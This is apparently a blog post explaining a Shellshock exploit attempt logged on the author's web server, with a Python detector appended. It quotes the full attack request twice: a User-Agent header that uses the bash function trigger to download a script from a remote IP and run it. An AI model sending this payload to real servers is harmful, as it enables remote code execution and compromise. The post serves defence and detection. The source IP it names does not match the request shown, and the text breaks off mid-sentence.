
What a Shellshock exploit attempt looks like

One of my HTTP servers, hosted on Amazon EC2, regularly receives strange requests like this one:

    GET /cgi-bin/php5 HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* ");'
    Host: 52.10.211.77
    Connection: Close

The IP address in the screen shot is from Austria (http://whois.domaintools.com/212.152.181.211). I received similar requests from the Netherlands, France and the UK. Unfortunately, I configured the HTTP server to erase old logs, so I can't say how many accesses I got or from which locations.

This is a variant of the Shellshock exploit discovered in September last year. How do you know that this is the Shellshock exploit? By seeing this text:

    User-Agent: () { :;};/usr/bin/perl -e

The `() { :;};` prefix is a bash function definition; vulnerable versions of bash evaluated it when the header value was exported as an environment variable (as a CGI handler does), and then kept executing whatever followed the closing brace, here the perl one-liner that downloads and runs a script.

The Shellshock vulnerabilities affect Bash, a program that various Unix-based systems use to execute command lines and command scripts. It is often installed as the system's default command-line interface. Bash is free software, developed collaboratively and overseen since 1992 on a volunteer basis by Chet Ramey, a professional software architect. Analysis of the…
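As an added example (not code from the original post), the following Python detector parses a raw HTTP request, flags any header that carries the `() {` function-definition prefix, and pulls out the download URLs as indicators worth blocking or hunting for; the sample request is the one quoted above, reconstructed with CRLF line endings, and the function and variable names are my own.

```python
import re
from typing import Dict, Optional

# Shellshock trigger: a value that begins with a bash function definition "() {".
# Any header a CGI handler exports to the environment (User-Agent, Referer,
# Cookie, ...) can carry it, so every header is checked, not just User-Agent.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
URL_RE = re.compile(r"https?://[^\s'\";)]+")


def parse_request(raw: str) -> Dict[str, str]:
    """Split a raw HTTP request into the request line and lower-cased headers."""
    lines = raw.strip().splitlines()
    parsed = {"request_line": lines[0].strip()}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            parsed[name.strip().lower()] = value.strip()
    return parsed


def find_shellshock(raw: str) -> Optional[Dict[str, object]]:
    """Return the offending header, the command after the trigger and the
    download URLs (IoCs), or None when no header carries the pattern."""
    parsed = parse_request(raw)
    for name, value in parsed.items():
        if name == "request_line":
            continue
        match = SHELLSHOCK_RE.search(value)
        if match:
            return {
                "request_line": parsed["request_line"],
                "header": name,
                # Drop the " :;};" body of the empty function to expose the command.
                "command": value[match.end():].lstrip(" :;}"),
                "urls": sorted(set(URL_RE.findall(value))),
            }
    return None


# Constructed sample: the request quoted in the post, CRLFs restored.
SAMPLE_REQUEST = (
    "GET /cgi-bin/php5 HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";"
    "system(\"cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; "
    "curl -O http://109.228.25.87/.c.txt ; chmod +x .c.txt* ; sh .c.txt* \");'\r\n"
    "Host: 52.10.211.77\r\nConnection: Close\r\n\r\n"
)
# Constructed benign request for comparison.
BENIGN_REQUEST = "GET /index.html HTTP/1.1\r\nHost: 52.10.211.77\r\nUser-Agent: Mozilla/5.0\r\n\r\n"

if __name__ == "__main__":
    print(find_shellshock(SAMPLE_REQUEST))
    print(find_shellshock(BENIGN_REQUEST))
```

The same check can be run over a web server's access log by feeding each logged User-Agent (or other header) value to `SHELLSHOCK_RE` instead of a full request.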

